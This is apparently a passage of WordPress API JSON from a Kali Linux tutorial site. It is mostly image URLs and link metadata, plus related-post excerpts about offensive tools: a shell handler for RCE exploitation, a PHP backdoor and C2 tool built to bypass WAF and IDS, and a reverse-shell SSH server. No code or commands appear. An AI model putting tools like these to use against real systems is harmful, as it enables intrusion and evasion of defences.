https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEjeHF6IYVex_qAke5KoUs6RZ7yWWKEy_gTyQMjQ_kFVfSM1Fb0o8W764rtwI_HsqwycqUvrjbztc9Rp_RAZyGe1BzLGH4Hpi9aCcvgq7b3IBjUbv84hZ4PNjFMjyYDWfRyzB0QfYzEVLVz49nz-TSlCPdm_qmiPS4QiPL-jDeeK4BKc90hzeeBzMf-Y\/s16000\/kali%20temp%20%281%29.png?resize=525%2C300&ssl=1 1.5x, https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEjeHF6IYVex_qAke5KoUs6RZ7yWWKEy_gTyQMjQ_kFVfSM1Fb0o8W764rtwI_HsqwycqUvrjbztc9Rp_RAZyGe1BzLGH4Hpi9aCcvgq7b3IBjUbv84hZ4PNjFMjyYDWfRyzB0QfYzEVLVz49nz-TSlCPdm_qmiPS4QiPL-jDeeK4BKc90hzeeBzMf-Y\/s16000\/kali%20temp%20%281%29.png?resize=700%2C400&ssl=1 2x"},"classes":[]},{"id":35185,"url":"https:\/\/kalilinuxtutorials.com\/penelope-2\/","url_meta":{"origin":32061,"position":2},"title":"Penelope &#8211; A Versatile Shell Handler For Exploiting RCE Vulnerabilities","author":"Varshini","date":"October 22, 2024","format":false,"excerpt":"Penelope is a shell handler designed to be easy to use and intended to replace netcat when exploiting RCE vulnerabilities. It is compatible with Linux and macOS and requires Python 3.6 or higher. It is a standalone script that does not require any installation or external dependencies, and it is\u2026","rel":"","context":"In &quot;Exploitation Tools&quot;","block_context":{"text":"Exploitation Tools","link":"https:\/\/kalilinuxtutorials.com\/category\/et\/"},"img":{"alt_text":"","src":"https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEhmRAPyFj5c_G4itIWfjazM86331B7Nt0oFMf-XDbgOrMKfItoablGQwzIG-oLvWTBzjk0JP7Ny5eELE5zeywB7h0KKjZLxSLF2FS-16l1gnIJjh6XiOVU2rEyW90AZM4zPp4oz1AFZYRrr66I_2kL1Uf6pT2gLprXbcHMYwdUJy-mWwE4S5qY94D0yE4AM\/s1600\/Penelope%20.webp?resize=350%2C200&ssl=1","width":350,"height":200,"srcset":"https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEhmRAPyFj5c_G4itIWfjazM86331B7Nt0oFMf-XDbgOrMKfItoablGQwzIG-oLvWTBzjk0JP7Ny5eELE5zeywB7h0KKjZLxSLF2FS-16l1gnIJjh6XiOVU2rEyW90AZM4zPp4oz1AFZYRrr66I_2kL1Uf6pT2gLprXbcHMYwdUJy-mWwE4S5qY94D0yE4AM\/s1600\/Penelope%20.webp?resize=350%2C200&ssl=1 1x, https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEhmRAPyFj5c_G4itIWfjazM86331B7Nt0oFMf-XDbgOrMKfItoablGQwzIG-oLvWTBzjk0JP7Ny5eELE5zeywB7h0KKjZLxSLF2FS-16l1gnIJjh6XiOVU2rEyW90AZM4zPp4oz1AFZYRrr66I_2kL1Uf6pT2gLprXbcHMYwdUJy-mWwE4S5qY94D0yE4AM\/s1600\/Penelope%20.webp?resize=525%2C300&ssl=1 1.5x, https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEhmRAPyFj5c_G4itIWfjazM86331B7Nt0oFMf-XDbgOrMKfItoablGQwzIG-oLvWTBzjk0JP7Ny5eELE5zeywB7h0KKjZLxSLF2FS-16l1gnIJjh6XiOVU2rEyW90AZM4zPp4oz1AFZYRrr66I_2kL1Uf6pT2gLprXbcHMYwdUJy-mWwE4S5qY94D0yE4AM\/s1600\/Penelope%20.webp?resize=700%2C400&ssl=1 2x, https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEhmRAPyFj5c_G4itIWfjazM86331B7Nt0oFMf-XDbgOrMKfItoablGQwzIG-oLvWTBzjk0JP7Ny5eELE5zeywB7h0KKjZLxSLF2FS-16l1gnIJjh6XiOVU2rEyW90AZM4zPp4oz1AFZYRrr66I_2kL1Uf6pT2gLprXbcHMYwdUJy-mWwE4S5qY94D0yE4AM\/s1600\/Penelope%20.webp?resize=1050%2C600&ssl=1 3x, https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEhmRAPyFj5c_G4itIWfjazM86331B7Nt0oFMf-XDbgOrMKfItoablGQwzIG-oLvWTBzjk0JP7Ny5eELE5zeywB7h0KKjZLxSLF2FS-16l1gnIJjh6XiOVU2rEyW90AZM4zPp4oz1AFZYRrr66I_2kL1Uf6pT2gLprXbcHMYwdUJy-mWwE4S5qY94D0yE4AM\/s1600\/Penelope%20.webp?resize=1400%2C800&ssl=1 4x"},"classes":[]},{"id":17479,"url":"https:\/\/kalilinuxtutorials.com\/bantam\/","url_meta":{"origin":32061,"position":3},"title":"Bantam : A PHP Backdoor Management And Generation tool\/C2 Featuring End To End Encrypted Payload Streaming Designed To Bypass WAF, IDS, SIEM Systems","author":"R K","date":"August 19, 2021","format":false,"excerpt":"Bantam is an advanced PHP backdoor management tool, with a lightweight server footprint, multi-threaded communication, and an advanced payload generation and obfuscation tool. Features end to end encryption with request unique encryption keys, and payload streaming designed to bypass WAF, IDS, SIEM systems. It incorporates several payload randomization and obfuscation\u2026","rel":"","context":"In &quot;Kali Linux&quot;","block_context":{"text":"Kali Linux","link":"https:\/\/kalilinuxtutorials.com\/category\/kali\/"},"img":{"alt_text":"","src":"","width":0,"height":0},"classes":[]},{"id":17434,"url":"https:\/\/kalilinuxtutorials.com\/reversessh\/","url_meta":{"origin":32061,"position":4},"title":"ReverseSSH : Statically-linked Ssh Server With Reverse Shell Functionality For CTFs And Such","author":"R K","date":"August 26, 2021","format":false,"excerpt":"ReverseSSH is a statically-linked ssh server with a reverse connection feature for simple yet powerful remote access. Most useful during HackTheBox challenges, CTFs or similar. Has been developed and was extensively used during OSCP exam preparation. Features Catching a reverse shell with\u00a0netcat\u00a0is cool, sure, but who hasn't accidentally closed a\u2026","rel":"","context":"In &quot;Kali Linux&quot;","block_context":{"text":"Kali Linux","link":"https:\/\/kalilinuxtutorials.com\/category\/kali\/"},"img":{"alt_text":"ReverseSSH : Statically-linked Ssh Server With Reverse Shell Functionality For CTFs And Such","src":"https:\/\/i0.wp.com\/1.bp.blogspot.com\/-iDjAdd1KHe8\/YSSYKe43V5I\/AAAAAAAAKiY\/LPeSNS2AYQkc0BOL1u2OP5euIXpU6NNegCLcBGAsYHQ\/s569\/ReverseSSH-SSH-Server-with-Reverse-Shell-Functionality-370x247%2B%25281%2529.png?resize=350%2C200&ssl=1","width":350,"height":200,"srcset":"https:\/\/i0.wp.com\/1.bp.blogspot.com\/-iDjAdd1KHe8\/YSSYKe43V5I\/AAAAAAAAKiY\/LPeSNS2AYQkc0BOL1u2OP5euIXpU6NNegCLcBGAsYHQ\/s569\/ReverseSSH-SSH-Server-with-Reverse-Shell-Functionality-370x247%2B%25281%2529.png?resize=350%2C200&ssl=1 1x, https:\/\/i0.wp.com\/1.bp.blogspot.com\/-iDjAdd1KHe8\/YSSYKe43V5I\/AAAAAAAAKiY\/LPeSNS2AYQkc0BOL1u2OP5euIXpU6NNegCLcBGAsYHQ\/s569\/ReverseSSH-SSH-Server-with-Reverse-Shell-Functionality-370x247%2B%25281%2529.png?resize=525%2C300&ssl=1 1.5x"},"classes":[]},{"id":12518,"url":"https:\/\/kalilinuxtutorials.com\/dwn\/","url_meta":{"origin":32061,"position":5},"title":"DWN : A Docker Pwn Tool Manager","author":"R K","date":"April 22, 2021","format":false,"excerpt":"DWN is a \"docker-compose for hackers\". Using a simple YAML \"plan\" format similar to docker-compose, image names, versions and volume \/ port mappings are defined to setup a tool for use. Features With dwn you can: Configure common pentest tools for use in a docker containerHave context aware volume mountsDynamically\u2026","rel":"","context":"In &quot;Kali Linux&quot;","block_context":{"text":"Kali Linux","link":"https:\/\/kalilinuxtutorials.com\/category\/kali\/"},"img":{"alt_text":"","src":"","width":0,"height":0},"classes":[]}],"_links":{"self":[{"href":"https:\/\/kalilinuxtutorials.com\/wp-json\/wp\/v2\/posts\/32061","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/kalilinuxtutorials.com\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/kalilinuxtutorials.com\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/kalilinuxtutorials.com\/wp-json\/wp\/v2\/users\/12"}],"replies":[{"embeddable":true,"href":"https:\/\/kalilinuxtutorials.com\/wp-json\/wp\/v2\/comments?post=32061"}],"version-history":[{"count":1,"href":"https:\/\/kalilinuxtutorials.com\/wp-json\/wp\/v2\/posts\/32061\/revisions"}],"predecessor-version":[{"id":32064,"href":"https:\/\/kalilinuxtutorials.com\/wp-json\/wp\/v2\/posts\/32061\/revisions\/32064"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/kalilinuxtutorials.com\/wp-json\/wp\/v2\/media\/32066"}],"wp:attachment":[{"href":"https:\/\/kalilinuxtutorials.com\/wp-json\/wp\/v2\/media?parent=32061"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/kalilinuxtutorials.com\/wp-json\/wp\/v2\/categories?post=32061"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/kalilinuxtutorials.com\/wp-json\/wp\/v2\/tags?post=32061"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}